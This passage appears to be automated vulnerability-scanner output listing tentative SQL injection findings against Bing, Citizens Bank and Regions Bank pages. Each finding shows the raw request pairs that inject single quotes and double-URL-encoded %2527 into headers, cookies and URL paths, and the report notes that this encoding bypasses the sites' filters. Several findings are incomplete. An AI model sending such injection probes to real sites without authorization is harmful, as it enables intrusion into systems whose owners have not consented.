Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=; OrigMUID=; _UR=OMW=0; RMS=F=O&A=S; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FBB=R=0; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338&hIm=846; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112%2527; _HOP=; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 9110
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:48:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /settings.aspx?ru=%2f&FORM=SELH HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=; OrigMUID=; _UR=OMW=0; RMS=F=O&A=S; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FBB=R=0; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338&hIm=846; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112%2527%2527; _HOP=; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20039
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:48:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

1.102. http://www.bing.com/settings.aspx [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bing.com
Path:	/settings.aspx

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /settings.aspx?ru=%2f&FORM=SELH HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=; OrigMUID=; _UR=OMW=0; RMS=F=O&A=S; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FBB=R=0; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338&hIm=846; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _HOP=; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 9110
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:48:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /settings.aspx?ru=%2f&FORM=SELH HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%2527%2527
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=; OrigMUID=; _UR=OMW=0; RMS=F=O&A=S; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FBB=R=0; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338&hIm=846; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _HOP=; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20039
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:48:56 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

1.103. http://www.bing.com/settings.aspx [_FP cookie] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bing.com
Path:	/settings.aspx

Issue detail

Remediation detail

Request 1

GET /settings.aspx?ru=%2f&FORM=SELH HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=%2527; OrigMUID=; _UR=OMW=0; RMS=F=O&A=S; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FBB=R=0; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338&hIm=846; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _HOP=; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM;

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 9110
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:48:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
lay:block;width:50%;float:left;width:25em}.sc_captcha p.picture{margin:1.54em 0}.sc_captcha p input{margin:0 0 1.54em 0}.sc_captcha h2{font-size:100%;font-weight:bold;color:#000;margin:0}.sc_captcha p.error{color:red}</style>
...[SNIP]...

Request 2

GET /settings.aspx?ru=%2f&FORM=SELH HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; _FP=%2527%2527; OrigMUID=; _UR=OMW=0; RMS=F=O&A=S; MUID=DC63BAA44C3843F38378B4BB213E0A6F; FBB=R=0; _SS=SID=4AF6A5397FEE47FCA6FD1F4826BF803F&bIm=338&hIm=846; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _HOP=; SRCHD=MS=1626581&SM=1&D=1593447&AF=NOFORM;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 20039
Content-Type: text/html; charset=utf-8
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
X-UA-Compatible: IE=7
Date: Thu, 03 Feb 2011 13:48:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...

1.104. http://www.citizensbank.com/everyday-points/default.aspx [Referer HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.citizensbank.com
Path:	/everyday-points/default.aspx

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /everyday-points/default.aspx HTTP/1.1
Host: www.citizensbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ClrOSSID=1296684060056-10144; WT_FPC=id=2f09a5fcfe32cca7b8b1296687659993:lv=1296687659993:ss=1296687659993; ClrSCD=1296684060056; ClrSSID=1296684060056-10144;
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 15:40:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Set-Cookie: HiddenPopup=popup=False; path=/
Set-Cookie: HiddenError=error=False; path=/
Set-Cookie: Referrer=url=http://www.google.com/search?hl=en&q=%2527; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_
...[SNIP]...
//Used by Modal Popup
   var BASE_URL = '/';
   var FULL_URL = '/tools/regionalgateway.aspx';
   var BRAND = 'Citizens';
   var BANK_ID = '1';
   var LANGUAGE = 'EN';
   var HEUX_NEED = '';
   var RGN_ERROR_INVALID = "Invalid entry - Please try again.";
   var RGN_ERROR_OFP = "ZIP Code is out of our business area - Please try again";
</script>
...[SNIP]...

Request 2

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 15:40:42 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=LanguageID=EN&Remember=False; path=/
Cache-Control: public
Expires: Thu, 03 Feb 2011 15:50:40 GMT
Vary: *
Content-Type: text/html; charset=utf-8
Content-Length: 12812

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta id="ctl00_objCommonHeader_mSe
...[SNIP]...

1.105. http://www.regions.com/about_regions/careers.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/about_regions/careers.rf

Issue detail

Request 1

GET /about_regions'/careers.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:49:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/about_regions'/careers.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 183

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fabout_regions'%2fcareers.rf">here</a>.</h2>
</body></html>

Request 2

GET /about_regions''/careers.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:49:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.106. http://www.regions.com/about_regions/faqs.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/about_regions/faqs.rf

Issue detail

Request 1

GET /about_regions'/faqs.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/about_regions'/faqs.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 180

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fabout_regions'%2ffaqs.rf">here</a>.</h2>
</body></html>

Request 2

GET /about_regions''/faqs.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.107. http://www.regions.com/about_regions/privacy_security.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/about_regions/privacy_security.rf

Issue detail

Request 1

GET /about_regions'/privacy_security.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/about_regions'/privacy_security.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 192

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fabout_regions'%2fprivacy_security.rf">here</a>.</h2>
</body></html>

Request 2

GET /about_regions''/privacy_security.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.108. http://www.regions.com/about_regions/terms_conditions.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/about_regions/terms_conditions.rf

Issue detail

Request 1

GET /about_regions'/terms_conditions.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1 (redirected)

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
Regions | Site Error
</title>
...[SNIP]...

Request 2

GET /about_regions''/terms_conditions.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

1.109. http://www.regions.com/commercial_banking/tms_disbursing_funds.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/commercial_banking/tms_disbursing_funds.rf

Issue detail

Request 1

GET /commercial_banking'/tms_disbursing_funds.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/commercial_banking'/tms_disbursing_funds.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 201

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fcommercial_banking'%2ftms_disbursing_funds.rf">here</a>.</h2>
</body></html>
...[SNIP]...

Request 2

GET /commercial_banking''/tms_disbursing_funds.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.110. http://www.regions.com/demos/overview.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/demos/overview.rf

Issue detail

Request 1

GET /demos'/overview.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/demos'/overview.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 176

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fdemos'%2foverview.rf">here</a>.</h2>
</body></html>

Request 2

GET /demos''/overview.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

1.111. http://www.regions.com/faq/javascript.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/faq/javascript.rf

Issue detail

Request 1

GET /faq'/javascript.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1 (redirected)

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3758

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
Regions | Site Error
</title>
...[SNIP]...

Request 2

GET /faq''/javascript.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2 (redirected)

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 16408

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...

1.112. http://www.regions.com/personal_banking/alternative_education_loans.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/personal_banking/alternative_education_loans.rf

Issue detail

Request 1

GET /personal_banking'/alternative_education_loans.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/alternative_education_loans.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 206

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fSiteError.aspx%3faspxerrorpath%3d%2fpersonal_banking'%2falternative_education_loans.rf">here</a>.</h2>
</body></h
...[SNIP]...

Request 2

GET /personal_banking''/alternative_education_loans.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748179248:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 2

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:50:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /404.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 126

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2f404.rf">here</a>.</h2>
</body></html>

1.113. http://www.regions.com/personal_banking/ehl.rf [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.regions.com
Path:	/personal_banking/ehl.rf

Issue detail

Request 1

GET /personal_banking'/ehl.rf HTTP/1.1
Host: www.regions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: www.regions.com-ssl=R1752032910; WT_FPC=id=2748f8ec8c6b6416b0b1296748179248:lv=1296748248575:ss=1296748179248; www.regions.com-http=R1402660298; ASP.NET_SessionId=phjubd2yvc5erifye2te4a55;

Response 1

HTTP/1.1 302 Found
Set-Cookie: www.regions.com-http=R1402660298; path=/
Connection: close
Date: Thu, 03 Feb 2011 15:55:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /SiteError.aspx?aspxerrorpath=/personal_banking'/ehl.rf
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 182

